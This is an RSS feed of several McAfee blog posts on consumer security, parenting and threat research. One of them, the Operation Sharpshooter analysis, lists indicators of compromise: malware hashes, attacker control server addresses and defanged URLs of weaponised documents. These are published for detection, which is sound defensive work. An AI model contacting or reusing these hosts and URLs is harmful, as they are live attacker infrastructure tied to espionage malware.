Overall, the event was quite the hit with attendees – as proven by demos, quizzes, and an interactive Q&A session. Sharing their feedback on the event , one of the participants said:

“The Cyber Security session which I attended today at McAfee India will go a long way in helping us enhance our knowledge and skills. The presentation given by Sandeep was excellent and the slides prepared by him were crisp and clear. We’d like to thank NASSCOM for arranging these sessions and we are looking for more such classroom sessions coming on our way.”

Sessions and programs such as these will go a long way in ensuring that organizations are helping pave way for women to enhance their skills, as well as give them an edge in their career development. McAfee is proud to play a role in influencing the overall India/APAC digital security ecosystem through it’s thought leadership.

The post McAfee India Hosts NASSCOM’s ‘Cyber Security Gurukul’ – An Exclusive Initiative for Women Professionals appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/mcafee-india-hosts-nasscoms-cyber-security-gurukul-an-exclusive-initiative-for-women-professionals/feed/ 0
How to Stay Secure from the Latest Volkswagen Giveaway Scam https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/volkswagen-giveaway-scam/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/volkswagen-giveaway-scam/#respond Thu, 13 Dec 2018 20:46:19 +0000 https://securingtomorrow.mcafee.com/?p=93089

You’re scrolling through Facebook and receive a message notification. You open it and see it’s from Volkswagen, claiming that the company will be giving away 20 free vehicles before the end of the year. If you think you’re about to win a new car, think again. This is likely a fake Volkswagen phishing scam, which […]

The post How to Stay Secure from the Latest Volkswagen Giveaway Scam appeared first on McAfee Blogs.

]]>

You’re scrolling through Facebook and receive a message notification. You open it and see it’s from Volkswagen, claiming that the company will be giving away 20 free vehicles before the end of the year. If you think you’re about to win a new car, think again. This is likely a fake Volkswagen phishing scam, which has been circulating social media channels like WhatsApp and Facebook, enticing hopeful users looking to acquire a new ride.

This fake Volkswagen campaign works differently than your typical phishing scam. The targeted user receives the message via WhatsApp or Facebook and is prompted to click on the link to participate in the contest. But instead of attempting to collect personal or financial information, the link simply redirects the victim to what appears to be a standard campaign site in Portuguese. When the victim clicks the buttons on the website, they are redirected to a third-party advertising site asking them to share the contest link with 20 of their friends. The scam authors, under the guise of being associated with Volkswagen, promise to contact the victims via Facebook once this task is completed.

As of now, we haven’t seen indicators that participants have been infected by malicious software or had any personal information stolen as a result of this scam. But because the campaign link redirects users to ad servers, the scam authors are able to maximize revenue for the advertising network. This encourages malicious third-party advertisers to continue these schemes in order to make a profit.

The holidays in particular are a convenient time for cybercriminals to create more scams like this one, as users look to social media for online shopping inspiration. Because schemes such as this could potentially be profitable for cybercriminals, it is unlikely that phishing scams spread via social media will let up. Luckily, we’ve outlined the following tips to help dodge fake online giveaways:

  • Avoid interacting with suspicious messages. If you receive a message from a company asking you to enter a contest or share a certain link, it is safe to assume that the sender is not from the actual company. Err on the side of caution and don’t respond to the message. If you want to see if a company is actually having a sale, it is best to just go directly to their official site to get more information.
  • Be careful what you click on. If you receive a message in an unfamiliar language, one that contains typos, or one that makes claims that seem too good to be true, avoid clicking on any attached links.
  • Stay secure while you browse online. Security solutions like McAfee WebAdvisor can help safeguard you from malware and warn you of phishing attempts so you can connect with confidence.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post How to Stay Secure from the Latest Volkswagen Giveaway Scam appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/volkswagen-giveaway-scam/feed/ 0
How To Help Your Teen Organise a Party Online Without It Becoming a Public Spectacle https://securingtomorrow.mcafee.com/consumer/family-safety/teen-parties-and-instagram/ https://securingtomorrow.mcafee.com/consumer/family-safety/teen-parties-and-instagram/#respond Thu, 13 Dec 2018 05:35:24 +0000 https://securingtomorrow.mcafee.com/?p=93074 Teen Parties and Instagram. If your teen is keen to have a party, I can guarantee you that they will not be handing out paper invitations on the playground! It’s all done online now my friends and that means – it can get very messy. When my kids were in Primary School, I would make […]

The post How To Help Your Teen Organise a Party Online Without It Becoming a Public Spectacle appeared first on McAfee Blogs.

]]>
Teen Parties and Instagram. If your teen is keen to have a party, I can guarantee you that they will not be handing out paper invitations on the playground! It’s all done online now my friends and that means – it can get very messy.

When my kids were in Primary School, I would make party invitations on Smilebox. It was so easy to personalise your invitation – you could, (and still can) add pics and even videos. And then best of all, you can print them out, or email them directly to your guests. Perfect!!

But, unfortunately, my teen boys won’t have a bar of Smilebox. Parties are now organised on Instagram which is definitely not as clean cut as Smilebox.

How Parties are Organised on Instagram

For those of you who aren’t familiar with the process of party organising on Instagram, let me share with you the process. But first, please sit down, it may make your hair stand on end.

  1. Create a private Instagram account that is specifically for the party eg Alex’s 21st Birthday Party. Include a small blurb about the party and encourage interested people to apply – I’m not joking!
  2. Tell a few key friends about the event and have them share the account in their Instagram story. This is to attract like-minded people who might be suitable for the party.
  3. People who are interested in attending the party then request to follow the account. The person holding the party then decides whether they would like the potential guest to attend. They check them out online and see if they are the ‘right fit’. If the potential guest’s request to follow is accepted, this means that they have an invite to the party.

Now, you can just imagine how this could play out. The fact the party account’s existence is shared by nominated friends means a teen’s entire school year and social circle quickly finds out about the party. And teens want to be included – we’ve all been there – so, of course many apply to attend the party. But unfortunately, numbers are limited so they are excluded but in the public arena that is Instagram.

I totally appreciate that you can’t have unlimited numbers to social gatherings, but life in the pre-social media era made this far easier to deal with. You may have known, for example, that your math class buddy, Rebecca, was having a party and that you weren’t invited. But you didn’t have to humiliate yourself by applying, being rejected and then having to view the fabulous images of the night, usually taken by a glossy professional photographer.

Is There Another Way?

No 4 son recently turned 15 and was super keen for a party. He and I were both determined to avoid this cruel approach to party organising. While he couldn’t have unlimited numbers and couldn’t invite everyone, our aim was to keep it as low key as possible while trying to avoid hurting kids’ feelings.

So, we went old-school! He invited guests directly. He did use Instagram but each guest received a private message. He did consider doing a group message on Instagram however there was a risk that the guests could add someone into the conversation and share the party details publicly.

And I’m pleased to report that the party went off without a hitch! I think my 2 eldest sons who were the ‘Security Team’ were a tad disappointment that there were no issues. I was very relieved!

Empathy Is Essential

As a mother of four sons, I am very aware of the importance of robust mental health. The digital world in which are kids are growing up adds a huge layer of complexity and additional pressures to daily life that didn’t exist when we were young. No longer can issues be left at school or on the bus, social media means you have no escape. And it is this constant pressure that is widely documented to be contributing to an increase in anxiety and depression amongst our teens.

It’s no secret that humans are at their most vulnerable during their teenage years. So, I strongly encourage parents of teens to help their offspring rethink their approach to organising social gatherings. Ask them to take a minute to think about how it would feel to be excluded from a party, particularly after having to gather the courage to apply to attend. I know it would have an impact on my self-worth and I’m in my 40’s!! Encourage them to find an alternative way of organising their event.

Digital Parenting Can Be a Tough Gig

Parenting ‘digital natives’ is tough. Our generation of kids have technology running through their veins while we are doing our best to stay up to date. If your teens dismisses your suggestions about party organising and keep assuring you that they have it ‘all under control’, take a deep breath. Respect for others, empathy and kindness is what you are trying to instill – and these concepts have been around for thousands of years!! So, stay strong!!

Till next time,

Alex xx

 

The post How To Help Your Teen Organise a Party Online Without It Becoming a Public Spectacle appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/teen-parties-and-instagram/feed/ 0
‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/#respond Wed, 12 Dec 2018 11:01:09 +0000 https://securingtomorrow.mcafee.com/?p=93008

This post was written with contributions from the McAfee Advanced Threat Research team.   The McAfee Advanced Threat Research team and McAfee Labs Malware Operations Group have discovered a new global campaign targeting nuclear, defense, energy, and financial companies, based on McAfee® Global Threat Intelligence. This campaign, Operation Sharpshooter, leverages an in-memory implant to download […]

The post ‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure appeared first on McAfee Blogs.

]]>

This post was written with contributions from the McAfee Advanced Threat Research team.  

The McAfee Advanced Threat Research team and McAfee Labs Malware Operations Group have discovered a new global campaign targeting nuclear, defense, energy, and financial companies, based on McAfee® Global Threat Intelligence. This campaign, Operation Sharpshooter, leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation. According to our analysis, the Rising Sun implant uses source code from the Lazarus Group’s 2015 backdoor Trojan Duuzer in a new framework to infiltrate these key industries.

Operation Sharpshooter’s numerous technical links to the Lazarus Group seem too obvious to immediately draw the conclusion that they are responsible for the attacks, and instead indicate a potential for false flags. Our research focuses on how this actor operates, the global impact, and how to detect the attack. We shall leave attribution to the broader security community.

Read our full analysis of Operation Sharpshooter.

Have we seen this before?

This campaign, while masquerading as legitimate industry job recruitment activity, gathers information to monitor for potential exploitation. Our analysis also indicates similar techniques associated with other job recruitment campaigns.

Global impact

In October and November 2018, the Rising Sun implant has appeared in 87 organizations across the globe, predominantly in the United States, based on McAfee telemetry and our analysis. Based on other campaigns with similar behavior, most of the targeted organizations are English speaking or have an English-speaking regional office. This actor has used recruiting as a lure to collect information about targeted individuals of interest or organizations that manage data related to the industries of interest. The McAfee Advanced Threat Research team has observed that the majority of targets were defense and government-related organizations.

Targeted organizations by sector in October 2018. Colors indicate the most prominently affected sector in each country. Source: McAfee® Global Threat Intelligence.

Infection flow of the Rising Sun implant, which eventually sends data to the attacker’s control servers.

 

Conclusion

Our discovery of this new, high-function implant is another example of how targeted attacks attempt to gain intelligence. The malware moves in several steps. The initial attack vector is a document that contains a weaponized macro to download the next stage, which runs in memory and gathers intelligence. The victim’s data is sent to a control server for monitoring by the actors, who then determine the next steps.

We have not previously observed this implant. Based on our telemetry, we discovered that multiple victims from different industry sectors around the world have reported these indicators.

Was this attack just a first-stage reconnaissance operation, or will there be more? We will continue to monitor this campaign and will report further when we or others in the security industry receive more information. The McAfee Advanced Threat Research team encourages our peers to share their insights and attribution of who is responsible for Operation Sharpshooter.

 

Indicators of compromise

MITRE ATT&CK™ techniques

  • Account discovery
  • File and directory discovery
  • Process discovery
  • System network configuration discovery
  • System information discovery
  • System network connections discovery
  • System time discovery
  • Automated exfiltration
  • Data encrypted
  • Exfiltration over command and control channel
  • Commonly used port
  • Process injection

Hashes

  • 8106a30bd35526bded384627d8eebce15da35d17
  • 66776c50bcc79bbcecdbe99960e6ee39c8a31181
  • 668b0df94c6d12ae86711ce24ce79dbe0ee2d463
  • 9b0f22e129c73ce4c21be4122182f6dcbc351c95
  • 31e79093d452426247a56ca0eff860b0ecc86009

Control servers

  • 34.214.99.20/view_style.php
  • 137.74.41.56/board.php
  • kingkoil.com.sg/board.php

Document URLs

  • hxxp://208.117.44.112/document/Strategic Planning Manager.doc
  • hxxp://208.117.44.112/document/Business Intelligence Administrator.doc
  • hxxp://www.dropbox.com/s/2shp23ogs113hnd/Customer Service Representative.doc?dl=1

McAfee detection

  • RDN/Generic Downloader.x
  • Rising-Sun
  • Rising-Sun-DOC

 

The post ‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/feed/ 0
A Quick Introduction to the MITRE ATT&CK Framework https://securingtomorrow.mcafee.com/business/endpoint-security/a-quick-introduction-to-the-mitre-attck-framework/ https://securingtomorrow.mcafee.com/business/endpoint-security/a-quick-introduction-to-the-mitre-attck-framework/#respond Tue, 11 Dec 2018 21:12:46 +0000 https://securingtomorrow.mcafee.com/?p=93048

If you’re an avid reader of threat trends or a fan of red team exercises, you’ve probably come across a reference to the MITRE ATT&CK framework in the last few months. If you have ever wondered what it was all about or if you’ve never heard of it but are interested in how you can […]

The post A Quick Introduction to the MITRE ATT&CK Framework appeared first on McAfee Blogs.

]]>

If you’re an avid reader of threat trends or a fan of red team exercises, you’ve probably come across a reference to the MITRE ATT&CK framework in the last few months. If you have ever wondered what it was all about or if you’ve never heard of it but are interested in how you can improve your security posture, this blog is for you.

To start with, let’s explain what MITRE is. MITRE is a nonprofit organization founded in 1958 (and funded with federal tax dollars) that works on projects for a variety of U.S. government agencies, including the IRS, Department of Defense (DOD), Federal Aviation Administration (FAA), and National Institute of Standards and Technology (NIST). It is not a professional third-party cybersecurity testing agency, which is a common misconception. Its focus is to provide U.S. government agencies with essential deliverables—such as models, technologies and intellectual property—related to U.S. national security, including cybersecurity, healthcare, tax policy, etc. In the cybersecurity landscape, MITRE is mostly known for managing Common Vulnerabilities and Exposures (CVEs) for software vulnerabilities. Note that CVEs are pre-exploitation/defense, whereas the MITRE ATT&CK model is focused on post-exploitation only.

Your next question is probably around what MITRE ATT&CK is and what makes it a model or a framework. The name stands for: Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK). It is a curated knowledgebase and model for cyberadversary behavior, reflecting the various phases of an adversary’s attack lifecycle and the platforms they are known to target. The tactics and techniques looked at in the model are used to classify adversary actions by offense and defense, relating them to specific ways of defending against them. What began as an idea in 2010 during an experiment has since grown into a set of evolving resources for cybersecurity experts to contribute to and apply for red teaming, threat hunting, and other tasks. Security practitioners can harden their endpoint defenses and accurately assess themselves by using the model and the tools to help determine how well they are doing at detecting documented adversary behavior.

If you’ve been in the security realm for a while, this may remind you somewhat of Lockheed Martin’s Cyber Kill Chain. It stated that attacks occur in stages and can be disrupted through controls established at each stage. It was also used to reveal the stages of a cyberattack. To understand the overlap of the two models, take a look at this figure:

In the figure above we see that the MITRE ATT&CK matrix model is essentially a subset of the Cyber Kill Chain, but it goes in depth when describing the techniques used between the Deliver and Maintain stages. The Cyber Kill Chain, including the MITRE ATT&CK model, might look like a linear process, but it actually isn’t. It’s rather a branching and looping chain, but we have shown it in a linear fashion to make it easier to understand.

At McAfee, we embrace the MITRE model as a fabulous and detailed way to think about adversarial activity, especially APTs post-compromise, and are applying it to different levels and purposes in our organization. Specifically, we are engineering our endpoint products using the insights gained from MITRE ATT&CK to significantly enhance our fileless threat defense capabilities. Additionally, we are using it to inform our roadmaps and are actively contributing to the model by sharing newly discovered techniques used by adversaries. We are partnering with MITRE and were recently a core sponsor of the inaugural MITRE ATT&CKcon in the Washington, D.C. area.

Over the next few weeks, I’ll continue to go deeper into how MITRE ATT&CK matrix testing works, how you can use it, how it’s different from other testing methods, and how McAfee is investing in it.

The post A Quick Introduction to the MITRE ATT&CK Framework appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/endpoint-security/a-quick-introduction-to-the-mitre-attck-framework/feed/ 0
12 Days of Hack-mas https://securingtomorrow.mcafee.com/consumer/mobile-and-iot-security/12-days-of-hack-mas/ https://securingtomorrow.mcafee.com/consumer/mobile-and-iot-security/12-days-of-hack-mas/#respond Tue, 11 Dec 2018 17:50:39 +0000 https://securingtomorrow.mcafee.com/?p=93036

2018 was a wild ride when it came to cybersecurity. While some hackers worked to source financial data, others garnered personal information to personalize cyberattacks. Some worked to get us to download malware in order to help them mine cryptocurrency or harness our devices to join their botnets. The ways in which they exact their […]

The post 12 Days of Hack-mas appeared first on McAfee Blogs.

]]>

2018 was a wild ride when it came to cybersecurity. While some hackers worked to source financial data, others garnered personal information to personalize cyberattacks. Some worked to get us to download malware in order to help them mine cryptocurrency or harness our devices to join their botnets. The ways in which they exact their attacks are becoming more sophisticated and harder to detect. 2019 shows no sign of slowing down when it comes to the sophistication and multitude of cyberattacks targeted toward consumers.

Between the apps and websites we use every day, in addition to the numerous connected devices we continue to add our homes, there are a more ways than ever in which our cybersecurity can be compromised. Let’s take a look at 12 common, connected devices that are vulnerable to attacks –most of which our friends at the “Hackable?” podcast have demonstrated– and what we can do to protect what matters. This way, as we move into the new year, security is top of mind.

Connected Baby Monitors

When you have a child, security and safety fuels the majority of your thoughts. That’s why it’s terrifying to think that a baby monitor, meant to give you peace of mind, could get hacked. Our own “Hackable?” team illustrated exactly how easy it is. They performed a “man-in-the-middle” attack to intercept data from an IoT baby monitor. But the team didn’t stop there; next they overloaded the device with commands and completely crashed the system without warning a parent, potentially putting a baby in danger. If you’re a parent looking to bring baby tech into your home, always be on the lookout for updates, avoid knockoffs or brands you’re not familiar with, and change your passwords regularly.

Smart TVs

With a click of a button or by the sound of our voice, our favorite shows will play, pause, rewind ten seconds, and more – all thanks to smart TVs and streaming devices. But is there a sinister side? Turns out, there is. Some smart TVs can be controlled by cybercriminals by exploiting easy-to-find security flaws. By infecting a computer or mobile device with malware, a cybercriminal could gain control of your smart TV if your devices are using the same Wi-Fi. To prevent an attack, consider purchasing devices from mainstream brands that keep security in mind, and update associated software and apps regularly.

Home Wi-Fi Routers

Wi-Fi is the lifeblood of the 21st century; it’s become a necessity rather than a luxury. But your router is also a cybercriminal’s window into your home. Especially if you have numerous IoT devices hooked up to the same Wi-Fi, a hacker that successfully cracks into your network can get ahold of passwords and personal information, all of which can be used to gain access to your accounts, and launch spear phishing attacks against you to steal your identity or worse. Cybercriminals do this by exploiting weaknesses in your home network. To stay secure, consider a comprehensive security solution like McAfee® Secure Home Platform.

Health Devices and Apps

Digital health is set to dominate the consumer market in the next few years. Ranging from apps to hardware, the ways in which our health is being digitized varies, and so do the types of attacks that can be orchestrated. For example, on physical devices like pacemakers, malware can be implanted directly on to the device, enabling a hacker to control it remotely and inflict real harm to patients. When it comes to apps like pedometers, a hacker could source information like your physical location or regular routines.  Each of these far from benign scenarios highlight the importance of cybersecurity as the health market becomes increasingly reliant on technology and connectivity.

Smart Speakers

It seems like everyone nowadays has at least one smart speaker in their home. However, these speakers are always listening in, and if hacked, could be exploited by cybercriminals through spear phishing attacks. This can be done by spoofing actual websites which trick users into thinking that they are receiving a message from an official source. But once the user clicks on the email, they’ve just given a cybercriminal access to their home network, and by extension, all devices connected to that network too, smart speakers and all. To stay secure, start with protection on your router that extends to your network, change default passwords, and check for built-in security features.

Voice Assistants

Like smart speakers, voice assistants are always listening and, if hacked, could gain a wealth of information about you. But voice assistants are also often used as a central command hub, connecting other devices to them (including other smart speakers, smart lights or smart locks). Some people opt to connect accounts like food delivery, driver services, and shopping lists that use credit cards. If hacked, someone could gain access to your financial information or even access to your home. To keep cybercriminals out, consider a comprehensive security system, know which apps you can trust, and always keep your software up to date.

Connected Cars

Today, cars are essentially computers on wheels. Between backup cameras, video screens, GPS systems, and Wi-Fi networks, they have more electronics stacked in them than ever. The technology makes the experience smoother, but if it has a digital heartbeat, it’s hackable. In fact, an attacker can take control of your car a couple of ways; either by physically implanting a tiny device that grants access to your car through a phone, or by leveraging a black box tool and  your car’s diagnostic port completely remotely. Hacks can range anywhere from cranking the radio up to cutting the transmission or disabling the breaks. To stay secure, limit connectivity between your mobile devices and a car when possible, as phones are exposed to risks every day, and any time you connect it to your car, you put it at risk, too.

Smart Thermostats

A smart thermostat can regulate your home’s temperature and save you money by learning your preferences. But what if your friendly temperature regulator turned against you? If you don’t change your default, factory-set password and login information, a hacker could take control of your device and make it join a botnet

Connected Doorbells

When we think high-tech, the first thing that comes to mind is most likely not a doorbell. But connected doorbells are becoming more popular, especially as IoT devices are more widely adopted in our homes. So how can these devices be hacked, exactly? By sending an official-looking email that requests that a device owner download the doorbell’s app, the user unwittingly gave full access to the unwelcome guest. From there, the hackers could access call logs, the number of devices available, and even video files from past calls. Take heed from this hack; when setting up a new device, watch out for phishing emails and always make sure that an app is legitimate before you download it.

Smart Pet Cameras

We all love our furry friends and when we have to leave them behind as we head out the door. And it’s comforting to know that we can keep an eye on them, even give them the occasional treat through pet cameras. But this pet-nology can be hacked into by cybercriminals to see what’s get an inside look at your home, as proven by the “Hackable?” crew. Through a device’s app, a white-hat hacker was able to access the product’s database and was able to download photos and videos of other device owners. Talk about creepy. To keep prying eyes out of your private photos, get a comprehensive security solution for your home network and devices, avoid checking on your pet from unsecured Wi-Fi, and do your research on smart products you purchase for your pets.

Cell Phones

Mobile phones are one of the most vulnerable devices simply because they go everywhere you go. They essentially operate as a personal remote control to your digital life. In any given day, we access financial accounts, confirm doctor’s appointments and communicate with family and friends. That’s why is shocking to know how surprisingly easy it is for cybercriminals to access the treasure trove of personal data on your cell phone. Phones can be compromised a variety of ways; but here are a few: accessing your personal information by way of public Wi-Fi (say, while you’re at an airport), implanting a bug, leveraging a flaw in the operating system, or by infecting your device with malware by way of a bad link while surfing the web or browsing email.  Luckily, you can help secure your device by using comprehensive security such as McAfee Total Protection, or by leveraging a VPN (virtual private network) if you find yourself needing to use public Wi-Fi.

Virtual Reality Headsets

Once something out of a science fiction, virtual reality (VR) is now a high-tech reality for many. Surprisingly, despite being built on state of the art technology, VR is quite hackable. As an example, though common and easy-to-execute tactics like phishing to prompt someone to download malware, white-hat hackers were able to infect a linked computer and execute a command and control interface that manipulated the VR experience and disorientated the user. While this attack isn’t common yet, it could certainly start to gain traction as more VR headsets make their way into homes. To stay secure, be picky and only download software from reputable sources.

This is only the tip of the iceberg when it comes to hackable, everyday items. And while there’s absolutely no doubt that IoT devices certainly make life easier, what it all comes down to is control versus convenience. As we look toward 2019, we should ask ourselves, “what do we value more?”

Stay up-to-date on the latest trends by subscribing to our podcast, “Hackable?” and follow us on Twitter or Facebook.

The post 12 Days of Hack-mas appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/mobile-and-iot-security/12-days-of-hack-mas/feed/ 0
How To Tell If Your Smartphone Has Been Hacked https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/how-to-tell-if-your-smartphone-has-been-hacked/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/how-to-tell-if-your-smartphone-has-been-hacked/#respond Mon, 10 Dec 2018 17:00:19 +0000 https://securingtomorrow.mcafee.com/?p=92956

Your home screen is just a matrix of numbers. Your device loses its charge quickly, or restarts suddenly. Or, you notice outgoing calls that you never dialed. Chances are your smartphone has been hacked. The sad truth is that hackers now have a multitude of ways to get into your phone, without ever touching it. […]

The post How To Tell If Your Smartphone Has Been Hacked appeared first on McAfee Blogs.

]]>

Your home screen is just a matrix of numbers. Your device loses its charge quickly, or restarts suddenly. Or, you notice outgoing calls that you never dialed. Chances are your smartphone has been hacked. The sad truth is that hackers now have a multitude of ways to get into your phone, without ever touching it.

Given that our smartphones have become our new wallets, containing a treasure trove of personal and financial information, a breach can leave you at serious risk.

The intruder could log in to your accounts as you, spam your contacts with phishing attacks, or rack up expensive long-distance charges. They could also access any passwords saved on your phone, potentially opening the door to sensitive financial accounts. That’s why it’s important to be able to recognize when your smartphone has been hacked, especially since some of the signs can be subtle.

Here are some helpful clues:

Performance Differences

Is your device operating slower, are web pages and apps harder to load, or does your battery never seem to keep a charge? What about your data plan? Are you exceeding your normal limits? These are all signs that you have malware running in the background, zapping your phone’s resources.

You may have downloaded a bad app, or clicked on a dangerous link in a text message. And malware, like Bitcoin miners, can strain computing power, sometimes causing the phone to heat up, even when you aren’t using it.

Mystery Apps or Data

If you find apps you haven’t downloaded, or calls, texts, and emails that you didn’t send, a hacker is probably in your system. They may be using your device to send premium rate calls or messages, or to spread malware to your contacts.

Pop-ups or Strange Screen Savers

Malware can also be behind spammy pop-ups, changes to your home screen, or bookmarks to suspicious websites. In fact, if you see any configuration changes you didn’t personally make, this is another big clue that your smartphone has been hacked.

What To Do

If any of these scenarios sound familiar, it’s time to take action. Start by deleting any apps or games you didn’t download, erasing risky messages, and running mobile security software, if you have it. Warn your contacts that your phone has been compromised, and to ignore any suspicious links or messages coming from you.

If the problem still doesn’t go away, consider restoring your phone to its original settings. Search online for instructions for your particular phone and operating system to learn how.

Now, let’s look at how to avoid getting hacked in the first place.

Secure Smartphone Tips

1. Use mobile security software—These days your smartphone is just as data rich as your computer. Make sure to protect your critical information, and your privacy, by using comprehensive mobile security software that not only protects you from online threats, but offers anti-theft and privacy protection.

2. Lock your device & don’t store passwords—Make sure that you are using a passcode or facial ID to lock your device when you’re not using it. This way, if you lose your phone it will be more difficult for a stranger to access your information.

Also, remember not to save password or login information for banking apps and other sensitive accounts. You don’t want a hacker to be able to automatically login as you if they do gain access to your device.

3. Avoid using public Wi-Fi—Free Wi-Fi networks, like those offered in hotels and airports, are often unsecured. This makes it easy for a hacker to potentially see the information you are sending over the network. Also, be wary of using public charging stations, unless you choose a “charging only” cable that cannot access your data.

 4. Never leave your device unattended in public—While many threats exist online, you still have to be aware of real-world threats, like someone grabbing your device when you’re not looking. Keep your smartphone on you, or within view, while in public.

If you have a “phone visibility” option, turn it off. This setting allows nearby devices to see your phone and exchange data with it.

5. Stay aware—New mobile threats are emerging all the time. Keep up on the latest scams and warning signs, so you know what to look out for.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Tell If Your Smartphone Has Been Hacked appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/how-to-tell-if-your-smartphone-has-been-hacked/feed/ 0
Helping Kids Deal with the Digital Rejection of ‘Ghosting’ https://securingtomorrow.mcafee.com/consumer/family-safety/helping-kids-deal-with-the-digital-rejection-of-ghosting/ https://securingtomorrow.mcafee.com/consumer/family-safety/helping-kids-deal-with-the-digital-rejection-of-ghosting/#respond Sat, 08 Dec 2018 15:00:54 +0000 https://securingtomorrow.mcafee.com/?p=92938 digital rejection of ghosting

Rejection is the unspoken risk that is present when we enter into any relationship be it a friendship or a love relationship. It’s a painful, inescapable part of life that most of us go to great lengths to avoid. That said, there’s a social media phenomenon called “ghosting” that can take the pain of rejection to […]

The post Helping Kids Deal with the Digital Rejection of ‘Ghosting’ appeared first on McAfee Blogs.

]]>
digital rejection of ghosting

digital rejection of ghostingRejection is the unspoken risk that is present when we enter into any relationship be it a friendship or a love relationship. It’s a painful, inescapable part of life that most of us go to great lengths to avoid. That said, there’s a social media phenomenon called “ghosting” that can take the pain of rejection to surprising depths — especially among teens.

Ghosting is when a person (or friend group) you’ve been talking to online suddenly stops all communication without any explanation.

Digital Dismissal

If you’re on the receiving end of the ghosting, consider yourself ghosted. Text conversations abruptly stop. You get blocked on all social media accounts. The ghost untags him or herself in all past photos on your profiles and deletes all past comments; theirs and yours. Direct messages (if not blocked) are marked as “seen” but never get a response.

Ghosting makes it feel as if a relationship never existed, which can leave anyone — child, teen, or adult — feeling hurt, frustrated, betrayed and even traumatized.

A teen named Jess* shared her ghosting experience and described feeling “helpless, confused, and worthless,” when a person she considered a boyfriend suddenly disappeared from her life after five months and started talking to another girl online. “One minute we were close and sharing all kinds of deep stuff and then, ‘poof’! He blocked me from his social media, stopped answering my texts, and started ignoring me at school. It’s as if I never existed to him.”

Rejection = Pain

In one study, MRI images showed that the same areas of the brain become activated when we experience a social rejection as when we experience physical pain, which is why rejection can hurt so much. According to Dr. Guy Winch, rejection destabilizes our need to belong and causes us to question our self-worth. “We often respond to romantic rejections by finding fault in ourselves, bemoaning all our inadequacies, kicking ourselves when we’re already down, and smacking our self-esteem into a pulp.” Rather, he clarifies, rejection is often just a matter of being mismatched in several areas such as chemistry, goals, and commitment level.

Micro-rejection 24/7

Thanks to social media, ghosting is not only a term but a common (albeit cruel) way to end an online relationship. Because it’s digital it’s easier for some people to view others as avatars; and easier to block rather than confront. It doesn’t help that the online culture fosters micro-rejections at every turn especially for tweens and teens. With every photo that is uploaded, so too, is a young person’s bid for approval. It’s not uncommon that a child’s happiness (or lack of) is influenced by the number of likes and comments a photo racks up.

While it may be impossible to protect our kids from painful digital rejections, we can equip them to handle it when and if it comes their way. Here are a few ideas that may help ease the pain of being ghosted.

Acknowledge the hurt

digital rejection of ghostingNo doubt, being ghosted hurts and can be embarrassing for your child (or anyone for that matter) to even talk about so tread lightly if you suspect it. Listen more than you speak and empathize more than advise if you learn this is a situation your child is experiencing. Acknowledge the real pain of being cut off, dismissed, blocked, and ignored. Ghosting can happen between two people or even with a friend group. If you have a similar situation and can relate, share that experience with your child.

Help frame the situation

Tweens and teens often do not have the tools they need in their emotional toolbox to deal with confrontation. Nor are they pros at communicating. So, rather than exit a relationship properly, some kids will find it easier to disappear with a simple click or two. Help your child understand the bigger picture that not all people will act with integrity or kindness. And, not all people are meant to be your friend or romantic match, and that’s okay. There are plenty of people who will value, love, and treat them with respect.

Help set healthy standards

Being ghosted, while painful, is also an opportunity to help your son or daughter define or re-define his or her standards. Ask: What qualities and characteristics you value in a friend or love interest? What values do you need to share with another person before trusting them? What warning signs should you look for next time that a person isn’t friend material? Advise: Don’t always be the person initiating every conversation, pay attention to the quality of interactions, don’t pursue people who are unresponsive or constantly “busy.”

Discourage retribution

digital rejection of ghostingWhile some ghosting situations are mild and dismissed quickly, others can cause the person ghosted to feel humiliated, angry, and vengeful. Lashing out at or trolling a ghost online as payback isn’t the answer and will only prolong the pain of being ghosted. Encourage your child that discovering the person’s character now is a gift and that moving on with wisdom and integrity (minus conflict) is the fastest way to heal.

Help them move on

One huge pain point for people who have been ghosted is that he or she did not get any closure or insight as to why the relationship ended. To help with this, you might suggest your son or daughter write a letter to get all the feelings out — but never mail it. Need the satisfaction of posting that letter online (minus names)? There’s a site for that (warning: language).

Beware of haunting

Haunting is when a ghost tries to reconnect in small ways over time. He or she may resurface to leave a comment or periodic likes to test the re-entry climate. Some may even send a direct message trying to explain the poor behavior. While every situation is different, warn your kids against reconnecting with anyone who would ghost a relationship. Encourage your child to invest time in friends who value friendships and honor the feelings of others.

*Name changed

The post Helping Kids Deal with the Digital Rejection of ‘Ghosting’ appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/helping-kids-deal-with-the-digital-rejection-of-ghosting/feed/ 0
